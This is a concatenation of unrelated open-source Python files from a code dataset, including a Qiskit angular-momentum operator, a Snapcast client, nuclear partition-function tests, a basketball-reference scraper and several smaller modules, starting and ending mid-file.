perform_clone_task_id = dictionary.get('performCloneTaskId')
restore_type = dictionary.get('restoreType')
scheduled_constituent_id = dictionary.get('scheduledConstituentId')
scheduled_gandalf_session_id = dictionary.get('scheduledGandalfSessionId')
start_time_usecs = dictionary.get('startTimeUsecs')
status = dictionary.get('status')
task_id = dictionary.get('taskId')
mtype = dictionary.get('type')
user = dictionary.get('user')
user_info = cohesity_management_sdk.models.user_information.UserInformation.from_dictionary(dictionary.get('userInfo')) if dictionary.get('userInfo') else None
view_box_id = dictionary.get('viewBoxId')
view_name_deprecated = dictionary.get('viewName_DEPRECATED')
# Return an object of this model
return cls(clone_task_name,
datastore_entity,
deploy_vms_to_cloud_task_state,
destroy_clone_app_task_info,
destroy_clone_vm_task_info,
destroy_mount_volumes_task_info,
end_time_usecs,
error,
folder_entity,
full_view_name,
parent_source_connection_params,
parent_task_id,
perform_clone_task_id,
restore_type,
scheduled_constituent_id,
scheduled_gandalf_session_id,
start_time_usecs,
status,
task_id,
mtype,
user,
user_info,
view_box_id,
view_name_deprecated)
| StarcoderdataPython |
1704984 | <gh_stars>0
from solicitudes.views import *
from django.contrib.auth import views
from django.urls import path
urlpatterns = [
path('', solicitudes_request, name='solicitudes'),
path('crear_solicitud', crear_solicitud, name='crear_solicitud'),
] | StarcoderdataPython |
1756129 | <filename>qiskit_nature/properties/second_quantization/electronic/angular_momentum.py<gh_stars>1-10
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""The AngularMomentum property."""
import logging
from typing import cast, List, Optional, Tuple
import itertools
import numpy as np
from qiskit_nature.drivers import QMolecule
from qiskit_nature.operators.second_quantization import FermionicOp
from qiskit_nature.results import EigenstateResult
from ..second_quantized_property import LegacyDriverResult
from .bases import ElectronicBasis
from .integrals import (
OneBodyElectronicIntegrals,
TwoBodyElectronicIntegrals,
)
from .types import ElectronicProperty
LOGGER = logging.getLogger(__name__)
class AngularMomentum(ElectronicProperty):
"""The AngularMomentum property."""
ABSOLUTE_TOLERANCE = 1e-05
RELATIVE_TOLERANCE = 1e-02
def __init__(
self,
num_spin_orbitals: int,
spin: Optional[float] = None,
absolute_tolerance: float = ABSOLUTE_TOLERANCE,
relative_tolerance: float = RELATIVE_TOLERANCE,
) -> None:
"""
Args:
num_spin_orbitals: the number of spin orbitals in the system.
spin: the expected spin of the system. This is only used during result interpretation.
If the measured value does not match this one, this will be logged on the INFO level.
absolute_tolerance: the absolute tolerance used for checking whether the measured
particle number matches the expected one.
relative_tolerance: the relative tolerance used for checking whether the measured
particle number matches the expected one.
"""
super().__init__(self.__class__.__name__)
self._num_spin_orbitals = num_spin_orbitals
self._spin = spin
self._absolute_tolerance = absolute_tolerance
self._relative_tolerance = relative_tolerance
@property
def spin(self) -> Optional[float]:
"""Returns the expected spin."""
return self._spin
@spin.setter
def spin(self, spin: Optional[float]) -> None:
"""Sets the expected spin."""
self._spin = spin
def __str__(self) -> str:
string = [super().__str__() + ":"]
string += [f"\t{self._num_spin_orbitals} SOs"]
if self.spin is not None:
string += [f"\tExpected spin: {self.spin}"]
return "\n".join(string)
@classmethod
def from_legacy_driver_result(cls, result: LegacyDriverResult) -> "AngularMomentum":
"""Construct an AngularMomentum instance from a :class:`~qiskit_nature.drivers.QMolecule`.
Args:
result: the driver result from which to extract the raw data. For this property, a
:class:`~qiskit_nature.drivers.QMolecule` is required!
Returns:
An instance of this property.
Raises:
QiskitNatureError: if a :class:`~qiskit_nature.drivers.WatsonHamiltonian` is provided.
"""
cls._validate_input_type(result, QMolecule)
qmol = cast(QMolecule, result)
return cls(
qmol.num_molecular_orbitals * 2,
)
def second_q_ops(self) -> List[FermionicOp]:
"""Returns a list containing the angular momentum operator."""
x_h1, x_h2 = _calc_s_x_squared_ints(self._num_spin_orbitals)
y_h1, y_h2 = _calc_s_y_squared_ints(self._num_spin_orbitals)
z_h1, z_h2 = _calc_s_z_squared_ints(self._num_spin_orbitals)
h_1 = x_h1 + y_h1 + z_h1
h_2 = x_h2 + y_h2 + z_h2
h1_ints = OneBodyElectronicIntegrals(ElectronicBasis.SO, h_1)
h2_ints = TwoBodyElectronicIntegrals(ElectronicBasis.SO, h_2)
return [(h1_ints.to_second_q_op() + h2_ints.to_second_q_op()).reduce()]
# TODO: refactor after closing https://github.com/Qiskit/qiskit-terra/issues/6772
def interpret(self, result: EigenstateResult) -> None:
"""Interprets an :class:`~qiskit_nature.results.EigenstateResult` in this property's context.
Args:
result: the result to add meaning to.
"""
expected = self.spin
result.total_angular_momentum = []
if not isinstance(result.aux_operator_eigenvalues, list):
aux_operator_eigenvalues = [result.aux_operator_eigenvalues]
else:
aux_operator_eigenvalues = result.aux_operator_eigenvalues # type: ignore
for aux_op_eigenvalues in aux_operator_eigenvalues:
if aux_op_eigenvalues is None:
continue
if aux_op_eigenvalues[1] is not None:
total_angular_momentum = aux_op_eigenvalues[1][0].real # type: ignore
result.total_angular_momentum.append(total_angular_momentum)
if expected is not None:
spin = (-1.0 + np.sqrt(1 + 4 * total_angular_momentum)) / 2
if not np.isclose(
spin,
expected,
rtol=self._relative_tolerance,
atol=self._absolute_tolerance,
):
LOGGER.info(
"The measured spin %s does NOT match the expected spin %s!",
spin,
expected,
)
else:
result.total_angular_momentum.append(None)
def _calc_s_x_squared_ints(num_modes: int) -> Tuple[np.ndarray, np.ndarray]:
return _calc_squared_ints(num_modes, _modify_s_x_squared_ints_neq, _modify_s_x_squared_ints_eq)
def _calc_s_y_squared_ints(num_modes: int) -> Tuple[np.ndarray, np.ndarray]:
return _calc_squared_ints(num_modes, _modify_s_y_squared_ints_neq, _modify_s_y_squared_ints_eq)
def _calc_s_z_squared_ints(num_modes: int) -> Tuple[np.ndarray, np.ndarray]:
return _calc_squared_ints(num_modes, _modify_s_z_squared_ints_neq, _modify_s_z_squared_ints_eq)
def _calc_squared_ints(num_modes: int, func_neq, func_eq) -> Tuple[np.ndarray, np.ndarray]:
# calculates 1- and 2-body integrals for a given angular momentum axis (x or y or z,
# specified by func_neq and func_eq)
num_modes_2 = num_modes // 2
h_1 = np.zeros((num_modes, num_modes))
h_2 = np.zeros((num_modes, num_modes, num_modes, num_modes))
# pylint: disable=invalid-name
for p, q in itertools.product(range(num_modes_2), repeat=2):
if p != q:
h_2 = func_neq(h_2, p, q, num_modes_2)
else:
h_2 = func_eq(h_2, p, num_modes_2)
h_1[p, p] += 1.0
h_1[p + num_modes_2, p + num_modes_2] += 1.0
h_1 *= 0.25
h_2 *= 0.25
return h_1, h_2
def _modify_s_x_squared_ints_neq(
h_2: np.ndarray, p_ind: int, q_ind: int, num_modes_2: int
) -> np.ndarray:
indices = [
(p_ind, p_ind + num_modes_2, q_ind, q_ind + num_modes_2),
(p_ind + num_modes_2, p_ind, q_ind, q_ind + num_modes_2),
(p_ind, p_ind + num_modes_2, q_ind + num_modes_2, q_ind),
(p_ind + num_modes_2, p_ind, q_ind + num_modes_2, q_ind),
]
values = [1, 1, 1, 1]
# adds provided values to values of 2-body integrals (x axis of angular momentum) at given
# indices in case p not equal to q
return _add_values_to_s_squared_ints(h_2, indices, values)
def _modify_s_x_squared_ints_eq(h_2: np.ndarray, p_ind: int, num_modes_2: int) -> np.ndarray:
indices = [
(p_ind, p_ind + num_modes_2, p_ind, p_ind + num_modes_2),
(p_ind + num_modes_2, p_ind, p_ind + num_modes_2, p_ind),
(p_ind, p_ind, p_ind + num_modes_2, p_ind + num_modes_2),
(p_ind + num_modes_2, p_ind + num_modes_2, p_ind, p_ind),
]
values = [-1, -1, -1, -1]
# adds provided values to values of 2-body integrals (x axis of angular momentum) at given
# indices in case p equal to q
return _add_values_to_s_squared_ints(h_2, indices, values)
def _modify_s_y_squared_ints_neq(
h_2: np.ndarray, p_ind: int, q_ind: int, num_modes_2: int
) -> np.ndarray:
indices = [
(p_ind, p_ind + num_modes_2, q_ind, q_ind + num_modes_2),
(p_ind + num_modes_2, p_ind, q_ind, q_ind + num_modes_2),
(p_ind, p_ind + num_modes_2, q_ind + num_modes_2, q_ind),
(p_ind + num_modes_2, p_ind, q_ind + num_modes_2, q_ind),
]
values = [-1, 1, 1, -1]
# adds provided values to values of 2-body integrals (y axis of angular momentum) at given
# indices in case p not equal to q
return _add_values_to_s_squared_ints(h_2, indices, values)
def _modify_s_y_squared_ints_eq(h_2: np.ndarray, p_ind: int, num_modes_2: int) -> np.ndarray:
indices = [
(p_ind, p_ind + num_modes_2, p_ind, p_ind + num_modes_2),
(p_ind + num_modes_2, p_ind, p_ind + num_modes_2, p_ind),
(p_ind, p_ind, p_ind + num_modes_2, p_ind + num_modes_2),
(p_ind + num_modes_2, p_ind + num_modes_2, p_ind, p_ind),
]
values = [1, 1, -1, -1]
# adds provided values to values of 2-body integrals (y axis of angular momentum) at given
# indices in case p equal to q
return _add_values_to_s_squared_ints(h_2, indices, values)
def _modify_s_z_squared_ints_neq(
h_2: np.ndarray, p_ind: int, q_ind: int, num_modes_2: int
) -> np.ndarray:
indices = [
(p_ind, p_ind, q_ind, q_ind),
(p_ind + num_modes_2, p_ind + num_modes_2, q_ind, q_ind),
(p_ind, p_ind, q_ind + num_modes_2, q_ind + num_modes_2),
(
p_ind + num_modes_2,
p_ind + num_modes_2,
q_ind + num_modes_2,
q_ind + num_modes_2,
),
]
values = [1, -1, -1, 1]
# adds provided values to values of 2-body integrals (z axis of angular momentum) at given
# indices in case p not equal to q
return _add_values_to_s_squared_ints(h_2, indices, values)
def _modify_s_z_squared_ints_eq(h_2: np.ndarray, p_ind: int, num_modes_2: int) -> np.ndarray:
indices = [
(p_ind, p_ind + num_modes_2, p_ind + num_modes_2, p_ind),
(p_ind + num_modes_2, p_ind, p_ind, p_ind + num_modes_2),
]
values = [1, 1]
# adds provided values to values of 2-body integrals (z axis of angular momentum) at given
# indices in case p equal to q
return _add_values_to_s_squared_ints(h_2, indices, values)
def _add_values_to_s_squared_ints(
h_2: np.ndarray, indices: List[Tuple[int, int, int, int]], values: List[int]
) -> np.ndarray:
for index, value in zip(indices, values):
h_2[index] += value
return h_2
| StarcoderdataPython |
1779362 | ########################################################################
# $Header: /var/local/cvsroot/4Suite/Ft/Xml/XPath/ParsedRelativeLocationPath.py,v 1.4 2005/02/09 11:10:54 mbrown Exp $
"""
A parsed token that represents a relative location path in the parsed result tree.
Copyright 2005 Fourthought, Inc. (USA).
Detailed license and copyright information: http://4suite.org/COPYRIGHT
Project home, documentation, distributions: http://4suite.org/
"""
class ParsedRelativeLocationPath:
def __init__(self, left, right):
self._left = left
self._right = right
return
def evaluate(self, context):
nodeset = self._left.select(context)
state = context.copy()
result = []
size = len(nodeset)
for pos in xrange(size):
context.node, context.position, context.size = \
nodeset[pos], pos + 1, size
result.extend(self._right.select(context))
context.set(state)
return result
select = evaluate
def pprint(self, indent=''):
print indent + str(self)
self._left.pprint(indent + ' ')
self._right.pprint(indent + ' ')
def __str__(self):
return '<RelativeLocationPath at %x: %s>' % (
id(self),
repr(self),
)
def __repr__(self):
return repr(self._left) + '/' + repr(self._right)
| StarcoderdataPython |
4813689 | from __future__ import (absolute_import, division, print_function,
with_statement, unicode_literals)
import socket, select, json
import threading
from operator import itemgetter
CLIENT_CONNECT_CHANGES = [
"Client.OnConnect",
"Client.OnDisconnect",
]
CLIENT_VOLUME_CHANGES = [
"Client.OnVolumeChanged",
]
CLIENT_CHANGES = [
"Client.OnLatencyChanged",
"Client.OnNameChanged",
]
GROUP_CHANGES = [
"Group.OnMutet",
"Group.OnStreamChanged",
]
SERVER_CHANGES = [
"Server.OnUpdate",
]
def distribute_volume(clients, sum_to_distribute):
""" Helper function to distribute volume changes to clients.
sum_to_distribute may be positive or negative """
client_count = len(clients)
client_sum = sum([client['old_volume'] for client in clients])
clients.sort(key = itemgetter('old_volume'), reverse=(True if sum_to_distribute > 0 else False) )
for client in clients:
if client_sum == 0:
value = sum_to_distribute // client_count
else:
value = sum_to_distribute * client['old_volume'] // client_sum
if client['old_volume'] + value >= 100:
sum_to_distribute += client['old_volume'] - 100
client['new_volume'] = 100
elif client['old_volume'] + value <= 0:
sum_to_distribute += client['old_volume']
client['new_volume'] = 0
else:
sum_to_distribute -= value
client['new_volume'] = client['old_volume'] + value
client_count -= 1
client_sum -= client['old_volume']
class snapcast(object):
def __init__(self, host, port, message_handler=None):
# connect to remote host
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect((host, port))
self.message_handler = message_handler
self.socket = s
self.msgid = 1
self.message = {}
self.gotmessage = threading.Event()
thread = threading.Thread(target=self.getmessage)
thread.setDaemon(True)
thread.start()
self.server = self.sendmessage('Server.GetStatus')['server']
def stop(self):
self.socket.close()
def sendmessage(self, method, params=None):
msg = { "id":self.msgid,"jsonrpc":"2.0","method": method }
if params:
msg['params'] = params
socketmsg = json.dumps(msg) + "\r\n"
select.select([],[self.socket],[])
self.socket.send(socketmsg)
self.gotmessage.wait()
self.msgid += 1
return self.message['result']
def getmessage(self):
while True:
self.gotmessage.clear()
select.select([self.socket],[],[])
data = ''
while len(data) == 0 or data[-1] != "\n":
data += self.socket.recv(1)
try:
my_data = json.loads(data)
except ValueError:
raise ValueError(data)
if 'id' in my_data:
if my_data['id'] == self.msgid:
self.message = my_data
self.gotmessage.set()
else:
raise ValueError(my_data)
else:
self.handle_message(**my_data)
def handle_message(self, method, jsonrpc, params):
if method in CLIENT_VOLUME_CHANGES:
client = self._GetClient(params['id'])
if client:
client['config']['volume'].update(params['volume'])
elif method in CLIENT_CONNECT_CHANGES:
client = self._GetClient(params['id'])
if client:
client['config'].update(params['client'])
elif method in CLIENT_CHANGES:
client = self._GetClient(params['id'])
if client:
client.update(params)
elif method in GROUP_CHANGES:
group = self._GetGroup(params['id'])
if group:
group.update(params)
else:
self.server['groups'].append(params)
elif method in SERVER_CHANGES:
self.server = params['server']
if self.message_handler:
self.message_handler(method, jsonrpc, params)
def _GetClient(self, client_id):
for group in self.server['groups']:
for client in group['clients']:
if client['id'] == client_id:
return client
def _SetClientVolume(self, client_id, key, value):
client = self._GetClient(client_id)
if client['config']['volume'][key] == value:
return True
else:
client['config']['volume'][key] = value
return self.sendmessage('Client.SetVolume', {'id': client_id, 'volume': {key : value}})
def MuteClient(self, client_id):
return self._SetClientVolume(client_id, 'muted', True)
def UnmuteClient(self, client_id):
return self._SetClientVolume(client_id, 'muted', False)
def SetClientVolume(self, client_id, volume):
return self._SetClientVolume(client_id, 'percent', volume)
def _GetGroup(self, group_id):
for group in self.server['groups']:
if group['id'] == group_id:
return group
def GetGroupMute(self, group_id):
mygroup = self._GetGroup(group_id)
return mygroup['muted']
def _MuteGroup(self, group_id, value):
mygroup = self._GetGroup(group_id)
if mygroup['mute'] == value:
return True
else:
mygroup['mute'] = value
return self.sendmessage('Group.SetMute', {'id': group_id, 'mute': value})
def MuteGroup(self, group_id):
return self._MuteGroup(group_id, True)
def UnmuteGroup(self, group_id):
return self._MuteGroup(group_id, False)
def GroupFromPath(self, path):
for stream in self.server['streams']:
if stream['uri']['path'] == path :
for group in self.server['groups']:
if group['stream_id'] == stream['id']:
return group['id']
def ActiveClientsFromGroup(self, GroupID):
group = self._GetGroup(GroupID)
ClientIDs = []
for client in group['clients']:
if client['connected'] and not client['config']['volume']['muted']:
ClientIDs.append(client['id'])
def MuteClientsInGroup(self, GroupID):
for ClientID in self.ActiveClientsFromGroup(GroupID):
self.MuteClient(ClientID)
def ExclusiveClientInGroup(self, my_client, GroupID):
self.UnmuteGroup(GroupID)
ActiveClients = self.ActiveClientsFromGroup(GroupID)
if ActiveClients:
for client in ActiveClients:
if client != my_client:
self.MuteClient(client)
self.UnmuteClient(my_client)
def GetGroupVolume(self, GroupID):
group = self._GetGroup(GroupID)
volume_sum = 0
num_clients = 0
for client in group['clients']:
if client['connected'] and not client['config']['volume']['muted']:
volume_sum += client['config']['volume']['percent']
num_clients += 1
if num_clients > 0:
return int(volume_sum / num_clients)
else:
return 0
def SetGroupVolume(self, GroupID, volume):
group = self._GetGroup(GroupID)
clients = []
sum_to_distribute = 0
for client in group['clients']:
if client['connected'] and not client['config']['volume']['muted']:
old_volume = client['config']['volume']['percent']
clients.append({'old_volume': old_volume,
'id': client['id']})
sum_to_distribute += volume - old_volume
if clients:
distribute_volume(clients, sum_to_distribute)
for client in clients:
if client['new_volume'] != client['old_volume']:
self.SetClientVolume(client['id'], client['new_volume'])
return True
else:
return False
| StarcoderdataPython |
60015 | <reponame>rblack42/TikzBuilder
__all__ = ['TikzBuilder']
| StarcoderdataPython |
1781779 | <reponame>FrankDuan/df_code
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import timeutils
SEND_ALL_TOPIC = b'D'
class DbUpdate(object):
"""Encapsulates a DB update
An instance of this object carries the information necessary to prioritize
and process a request to update a DB entry.
Lower value is higher priority !
"""
def __init__(self, table, key, action, value, priority=5,
timestamp=None, topic=SEND_ALL_TOPIC):
self.priority = priority
self.timestamp = timestamp
if not timestamp:
self.timestamp = timeutils.utcnow()
self.key = key
self.action = action
self.table = table
self.value = value
self.topic = topic
def to_dict(self):
update = {
'table': self.table,
'key': self.key,
'action': self.action,
'value': self.value,
'topic': self.topic
}
return update
def __str__(self):
return "Action:%s, Table:%s, Key:%s Value:%s Topic:%s" % (
self.action,
self.table,
self.key,
self.value,
self.topic,
)
def __lt__(self, other):
"""Implements priority among updates
Lower numerical priority always gets precedence. When comparing two
updates of the same priority then the one with the earlier timestamp
gets procedence. In the unlikely event that the timestamps are also
equal it falls back to a simple comparison of ids meaning the
precedence is essentially random.
"""
if self.priority != other.priority:
return self.priority < other.priority
if self.timestamp != other.timestamp:
return self.timestamp < other.timestamp
return self.key < other.key
| StarcoderdataPython |
3228261 | from pathlib import Path
from fhir.resources.valueset import ValueSet as _ValueSet
from oops_fhir.utils import ValueSet
from oops_fhir.r4.code_system.v3_query_parameter_value import (
v3QueryParameterValue as v3QueryParameterValue_,
)
__all__ = ["v3QueryParameterValue"]
_resource = _ValueSet.parse_file(Path(__file__).with_suffix(".json"))
class v3QueryParameterValue(v3QueryParameterValue_):
"""
v3 Code System QueryParameterValue
The domain of coded values used as parameters within QueryByParameter
queries.
Status: active - Version: 2018-08-12
http://terminology.hl7.org/ValueSet/v3-QueryParameterValue
"""
class Meta:
resource = _resource
| StarcoderdataPython |
1733907 | from numpy import array, all, ones_like
from pynucastro.nucdata import PartitionFunctionTable, PartitionFunctionCollection
import os
nucdata_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
pf_dir = os.path.join(nucdata_dir, 'PartitionFunction')
dir_etfsiq_low = os.path.join(pf_dir, 'etfsiq_low.txt')
dir_frdm_low = os.path.join(pf_dir, 'frdm_low.txt')
dir_etfsiq_high = os.path.join(pf_dir, 'etfsiq_high.txt')
dir_frdm_high = os.path.join(pf_dir, 'frdm_high.txt')
ANSWER_ETFSIQ_LOW = array([1.000271, 1.002656, 1.009124, 1.035543, 1.076750, 1.128518, 1.187847, 1.252797,
1.322103, 1.394926, 1.470693, 1.883077, 2.339548, 2.835353, 3.371056, 3.949365,
4.574281, 5.250894, 5.985411, 7.659520, 9.675912, 12.147961, 15.237089, 19.172457])
ANSWER_FRDM_LOW = array([1.000157, 1.001534, 1.005265, 1.020486, 1.044185, 1.073899, 1.107886, 1.145013,
1.184544, 1.225988, 1.269010, 1.501456, 1.755494, 2.027655, 2.317420, 2.625339,
2.952505, 3.300375, 3.670713, 4.487378, 5.423159, 6.505528, 7.771334, 9.270601])
ANSWER_ETFSIQ_HIGH = array([5.79E+000, 1.07E+001, 2.13E+001, 4.38E+001, 9.23E+001, 1.97E+002, 4.23E+002,
9.12E+002, 1.97E+003, 4.25E+003, 2.92E+004, 2.00E+005, 1.36E+006, 9.31E+006,
6.34E+007, 4.31E+008, 2.92E+009, 1.97E+010, 1.33E+011, 8.93E+011, 5.98E+012,
3.99E+013, 2.65E+014, 1.76E+015, 1.16E+016, 7.66E+016, 5.03E+017, 3.30E+018,
2.16E+019, 1.41E+020, 9.21E+020, 6.00E+021, 3.91E+022, 2.54E+023, 1.65E+024,
1.07E+025, 6.97E+025, 4.52E+026, 2.94E+027, 1.91E+028, 8.07E+029, 3.42E+031,
1.46E+033, 6.23E+034, 2.68E+036, 1.16E+038, 5.03E+039, 6.45E+043])
ANSWER_FRDM_HIGH = array([9.40e+007, 2.81e+009, 4.93e010, 1.95e+012, 8.84e+013, 3.66e+015, 1.44e+017,
5.48e+018, 2.04e+020, 7.48e+021, 5.72e+025, 4.07e+029, 2.69e+033, 1.66e+037,
9.60e+040, 5.20e+044, 2.65e+048, 1.28e+052, 5.85e+055, 2.55e+059, 1.06e+063,
4.27e+066, 1.65e+070, 6.16e+073, 2.23e+077, 7.87e+080, 2.71e+084, 9.15e+087,
3.03e+091, 9.86e+094, 3.17e+098, 1.00e+102, 3.14e+105, 9.77e+108, 3.01e+112,
9.23e+115, 2.82e+119, 8.56e+122, 2.59e+126, 7.85e+129, 7.18e+136, 6.59e+143,
6.11e+150, 5.74e+157, 5.48e+164, 5.35e+171, 5.34e+178, 1.88e+196])
TEMPERATURES_LOW = array([0.01E+9, 0.15E+9, 0.2E+9, 0.3E+9, 0.4E+9, 0.5E+9, 0.6E+9,
0.7E+9, 0.8E+9, 0.9E+9, 1.0E+9, 1.5E+9, 2.0E+9, 2.5E+9,
3.0E+9, 3.5E+9, 4.0E+9, 4.5E+9, 5.0E+9, 6.0E+9, 7.0E+9,
8.0E+9, 9.0E+9, 10.0E+9])
TEMPERATURES_HIGH = array([12.0E+9, 14.0E+9, 16.0E+9, 18.0E+9, 20.0E+9, 22.0E+9, 24.0E+9,
26.0E+9, 28.0E+9, 30.0E+9, 35.0E+9, 40.0E+9, 45.0E+9, 50.0E+9,
55.0E+9, 60.0E+9, 65.0E+9, 70.0E+9, 75.0E+9, 80.0E+9, 85.0E+9,
90.0E+9, 95.0E+9, 100.0E+9, 105.0E+9, 110.0E+9, 115.0E+9, 120.0E+9,
125.0E+9, 130.0E+9, 135.0E+9, 140.0E+9, 145.0E+9, 150.0E+9, 155.0E+9,
160.0E+9, 165.0E+9, 170.0E+9, 175.0E+9, 180.0E+9, 190.0E+9, 200.0E+9,
210.0E+9, 220.0E+9, 230.0E+9, 240.0E+9, 250.0E+9, 275.0E+9])
DEFAULT = ones_like(TEMPERATURES_LOW)
class TestPartition:
@classmethod
def setup_class(cls):
""" this is run once for each class before any tests """
pass
@classmethod
def teardown_class(cls):
""" this is run once for each class before any tests """
pass
def setup_method(self):
""" this is run once for each class before any tests """
self.pf_table_etfsiq_low = PartitionFunctionTable(dir_etfsiq_low)
self.pf_table_frdm_low = PartitionFunctionTable(dir_frdm_low)
self.pf_table_etfsiq_high = PartitionFunctionTable(dir_etfsiq_high)
self.pf_table_frdm_high = PartitionFunctionTable(dir_frdm_high)
self.co46_pf_etfsiq_low = self.pf_table_etfsiq_low.get_partition_function('co46')
self.ne37_pf_frdm_low = self.pf_table_frdm_low.get_partition_function('ne37')
self.fe47_pf_etfsiq_high = self.pf_table_etfsiq_high.get_partition_function('fe47')
self.po188_pf_frdm_high = self.pf_table_frdm_high.get_partition_function('po188')
self.ne19_pf_frdm_low = self.pf_table_frdm_low.get_partition_function('ne19')
self.ne19_pf_frdm_high = self.pf_table_frdm_high.get_partition_function('ne19')
self.co60_pf_etfsiq_low = self.pf_table_etfsiq_low.get_partition_function('co60')
self.co60_pf_etfsiq_high = self.pf_table_etfsiq_high.get_partition_function('co60')
self.pf_collection_frdm = PartitionFunctionCollection(use_set='frdm')
self.pf_collection_etfsiq = PartitionFunctionCollection(use_set='etfsiq')
def teardown_method(self):
""" this is run once for each class before any tests """
pass
def test_pf(self):
assert all(self.pf_collection_frdm.get_partition_function('p').partition_function == DEFAULT)
assert all(self.pf_collection_etfsiq.get_partition_function('n').partition_function == DEFAULT)
def test_pf_table(self):
assert all(self.co46_pf_etfsiq_low.partition_function == ANSWER_ETFSIQ_LOW)
assert all(self.co46_pf_etfsiq_low.temperature == TEMPERATURES_LOW)
assert all(self.ne37_pf_frdm_low.partition_function == ANSWER_FRDM_LOW)
assert all(self.ne37_pf_frdm_low.temperature == TEMPERATURES_LOW)
assert all(self.fe47_pf_etfsiq_high.partition_function == ANSWER_ETFSIQ_HIGH)
assert all(self.fe47_pf_etfsiq_high.temperature == TEMPERATURES_HIGH)
assert all(self.po188_pf_frdm_high.partition_function == ANSWER_FRDM_HIGH)
assert all(self.po188_pf_frdm_high.temperature == TEMPERATURES_HIGH)
def test_pfsum(self):
assert self.pf_collection_etfsiq.get_partition_function('co60') == self.co60_pf_etfsiq_low + self.co60_pf_etfsiq_high
assert self.pf_collection_frdm.get_partition_function('ne19') == self.ne19_pf_frdm_high + self.ne19_pf_frdm_low
| StarcoderdataPython |
104603 | <reponame>LiuHao-THU/nba_logistic_regression<filename>basketball_reference/nba.py
import json
import logging, logging.config
import requests
from bs4 import BeautifulSoup
from base import BRefMatch, BRefSeason
from constants import LEAGUES_TO_PATH
from utils import TimeoutException, convert_to_min
with open('logging.json', 'r') as f:
logging.config.dictConfig(json.load(f))
logger = logging.getLogger('stringer-bell')
class NbaBRefMatch(BRefMatch):
uri_base = 'http://www.basketball-reference.com/boxscores/{0}.html'
def _read_table(self, table, last_col):
"""
reads given table and updates relevant stats in match dict
"""
away, home = table[0], table[1]
for team, table in zip(['away', 'home'], [away, home]):
self.parse_teams(team, table, last_col)
self.parse_players(team, table)
def parse_teams(self, team, table, plus_minus):
metrics = [metric.text for metric in
table.find('thead').find_all('tr')[1].find_all('th')[2:]]
stats = table.find('tfoot').find_all('td')[1:]
if not plus_minus and '+/-' in metrics:
stats.pop(-1)
metrics.pop(-1)
stats = [float(s.text) for s in stats]
self.match_[team]['totals'].update(dict(zip(metrics, stats)))
def parse_players(self, team, table):
metrics = [metric.text for metric in
table.find('thead').find_all('tr')[1].find_all('th')[1:]]
rows = table.find('tbody').find_all('tr')
rows.pop(5)
for player in rows:
name = player.th.a.text
stats = [inf.text for inf in player.find_all('td')]
for metric, stat in zip(metrics, stats):
stat = stat if stat != '' else None
if metric == 'MP':
stat = stat if stat not in [None, 'Did Not Play', 'Player Suspended'] else '0.0'
stat = convert_to_min(stat)
stat = float(stat) if stat else None
self.match_[team]['players'][name][metric] = stat
def _gen_scoring(self):
"""
generate and add scoring information to match dict
"""
def gen_scoring(table):
rows = table.find_all('tr')
quarters = [row.text for row in rows[1].find_all('th')[1:]]
away, home = rows[2:4]
scores = {}
for team, scoring in zip(['away', 'home'], [away, home]):
scoring = [score.text for score in scoring.find_all('td')[1:]]
quarters_score = dict(zip(quarters, scoring))
scores[team] = quarters_score
return scores
src = str(self.soup_.find('div', {'id': 'all_line_score'}))
src = src.replace('<!--', '')
scoring_table = BeautifulSoup(src).find('table', {'id': 'line_score'})
quarters_score = gen_scoring(scoring_table)
for team, scores in quarters_score.items():
self.match_[team]['scores'] = scores
def _gen_extra_info(self):
"""
generate and add attendance, duration and officials info to match dict
"""
pass
# divs = [c for c in self.soup_.find('div', {'id': 'content'}).children]
# extra = divs[-12]
# import ipdb; ipdb.set_trace()
# for el in extra:
# if 'referees' in el:
# self.match_['officials'] = [a.text for a in extra.find_all('a')]
# elif 'Attendance:' in el:
# self.match_['attendance'] = int(val.replace(',', ''))
# elif var == 'Time of Game:':
# hours, minutes = val.split(':')
# self.match_['duration'] = int(hours) * 60 + int(minutes)
class NbaBRefSeason(BRefSeason):
def _crawl_match(self, code, match_type):
match = NbaBRefMatch(self.country, self.league, self.season, code, match_type)
if not match.is_crawled():
for j in range(5):
try:
match.crawl()
logger.info('Crawled - {0}'.format(code))
break
except TimeoutException:
logger.info("Timeout. Couldn't crawl match {0}. Retrying {1}/5".format(code, j+1))
continue
except:
logger.exception("Couldn't crawl match{0}".format(code))
break
def _gen_matches_codes(self):
"""
generates b-reference codes for given league, season and date to crawl
"""
self.reg_s_codes_, self.post_s_codes_ = [], []
base_url = LEAGUES_TO_PATH['nba'].format(self.season.split('-')[1])
for month in ['october', 'november', 'december', 'january',
'february', 'march', 'april', 'may', 'june']:
url = base_url.replace('.html', '-' + month + '.html')
self._gen_month_codes(url)
def _gen_month_codes(self, url):
rv = requests.get(url)
soup = BeautifulSoup(rv.text)
seasons = soup.find_all('table', {'class': 'stats_table'})
if len(seasons) == 2:
reg_season, post_season = seasons
else:
reg_season, post_season = seasons[0], None
for codes, table in zip([self.reg_s_codes_, self.post_s_codes_],
[reg_season, post_season]):
if table:
rows = table.tbody.find_all('tr')
for row in rows:
match = row.find('a', href=True, text='Box Score')
if match:
match_code = match['href'].split('/')[2].split('.')[0]
codes.append(match_code)
| StarcoderdataPython |
1729292 | <gh_stars>1-10
__all__ = ('run_tests_in', )
from os.path import isfile as is_file, split as split_paths
from sys import path as system_paths, stdout
from .exceptions import TestLoadingError
from .test_file import __file__ as VAMPYTEST_TEST_FILE_PATH
from .test_file_collector import collect_test_files
from scarletio import render_exception_into
BREAK_LINE = '='*40
def ignore_module_import_frame(file_name, name, line_number, line):
"""
Ignores the frame, where the test file was imported.
Parameters
----------
file_name : `str`
The frame's respective file's name.
name : `str`
